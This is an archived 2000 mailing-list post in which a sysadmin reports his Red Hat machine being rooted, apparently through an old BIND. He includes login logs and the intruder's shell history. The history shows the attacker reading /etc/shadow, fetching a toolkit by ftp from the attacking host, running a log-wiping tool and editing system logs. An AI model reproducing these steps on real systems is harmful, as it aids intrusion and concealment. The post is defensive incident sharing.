Security Incidents mailing list archives
rooted by r0x - from address 212.177.241.127
From: dschauer () VCSD COM (Dwight Schauer)
Date: Wed, 29 Mar 2000 06:50:59 -0600
A machine that I am responsible for was rooted sometime between 12:04 and 12:06 CST on Mar 28, 2000. The machine had just had RedHat 6.1 installed and not all the updates were on it. I believe the intruder got in through the bind (The version that was running at the time has know exploits, I know) Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127 Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127 Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127 Mar 28 12:04:45 7of9 sshd[15116]: refused connect from 212.177.241.127 Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127 Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127 Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127 Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127 Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127 Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
From my named/bind default directory:
drwxr-xr-x 2 root root 1024 Mar 28 12:05 ADMROCKS That directory was not placed there by me. The version of bind running on the machine was bind-8.2.1-7 (It had bind-8.2.2_P3-1 before 6.1 was reinstalled on it, that update was somehow overlooked) Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127 Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by (uid=0) Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 212.177.241.127. Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127 Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127 Mar 28 12:12:59 7of9 PAM_pwdb[15174]: (login) session opened for user r0x by (uid=0) Mar 28 12:14:31 7of9 in.telnetd[15192]: connect from 212.177.241.127 Mar 28 12:14:43 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127 Mar 28 12:14:43 7of9 PAM_pwdb[15193]: (login) session opened for user r0x by (uid=0) The cracker ran some things out /tmp and then moved on to /usr/doc/gd-1.3/ There the cracker created a directory called FAQ and dumped his payload/toolkits in there. An attempt was made to edit the logs, but they had already been emailed elsewhere by logcheck. Pico was used to edit the logs, and pico saved a backup copy, or so it appears. This is the .bash_history from /tmp: cd /usr cd doc ls cd gd-1.3 ls mkdir FAQ cd FAQ ls pwd cat /etc/shadow ps uxa | grep sshd ls ftp 212.177.241.127 ls tar xvfz a.tar.gz pico ulogin.c pico ulogin.c cd /usr/doc/gd-1.3/FAQ chmod +x Uaz ./UAz ./Uaz ls ps uxa | grep suid kill 15189 ls ls ls ls ftp updates.redhat.com ls cd bin ls ./zap2 r0x ./zap2 r0x ./zap2 r0x dddddddddddddd exit The ftp to updates.redhat.com was interesting, maybe he was going to upgrade bind for me ;-) This is the .bash_history from roots account (in ~root) (with prior to attack history removed) w w w w pico /etc/passwd pico /etc/passwd passwd games cd /tmp cp /var/log/messages ./ /usr/sbin/named mv messages /var/log pico /var/log/messages pico /var/log/secure pico /var/log/secure pico /var/log/secure The w's could have been me. Everything prior to the w's was most definately me. The last root access I had to the machine was on the 27th of March. (Until after the attack) Like I said, I believe the comprimise was through bind. If anyone thinks otherwise, let me know. If anyone wants them, I can give them the full log and history files, and full payload that was dumped on me by the cracker. -- Dwight Schauer <dschauer () vcsd com>
Current thread:
- Re: 8 hours of pinging, (continued)
- Re: 8 hours of pinging spiff (Mar 22)
- Curious HTTP related probings. Scott A . McIntyre (Mar 22)
- Re: Curious HTTP related probings. Erik Fichtner (Mar 22)
- Re: Curious HTTP related probings. Russell Fulton (Mar 22)
- [Fwd: [fw-wiz] Specious network performance measurements.] horio shoichi (Mar 22)
- Re: 8 hours of pinging Scott Wunsch (Mar 22)
- Re: 8 hours of pinging Robert Graham (Mar 22)
- Re: 8 hours of pinging Rainer Freis (Mar 27)
- Re: 8 hours of pinging Ed Padin (Mar 28)
- Re: 8 hours of pinging Dragos Ruiu (Mar 29)
- rooted by r0x - from address 212.177.241.127 Dwight Schauer (Mar 29)
- Re: rooted by r0x - from address 212.177.241.127 Ethan King (Mar 29)
- Re: rooted by r0x - from address 212.177.241.127 Rick Magill (Mar 30)
- sendmail/identd attack Guido A.J. Stevens (Mar 30)
- Re: rooted by r0x - from address 212.177.241.127 Ryan Russell (Mar 29)
- UDP port 9200 Bobby, Paul (Mar 30)
- Re: UDP port 9200 Robert Graham (Mar 30)
- Re: UDP port 9200 Joey McAlerney (Mar 30)
- Re: rooted by r0x - from address 212.177.241.127 Jens Hektor (Mar 31)
- Re: 8 hours of pinging Robert Kulagowski (Mar 29)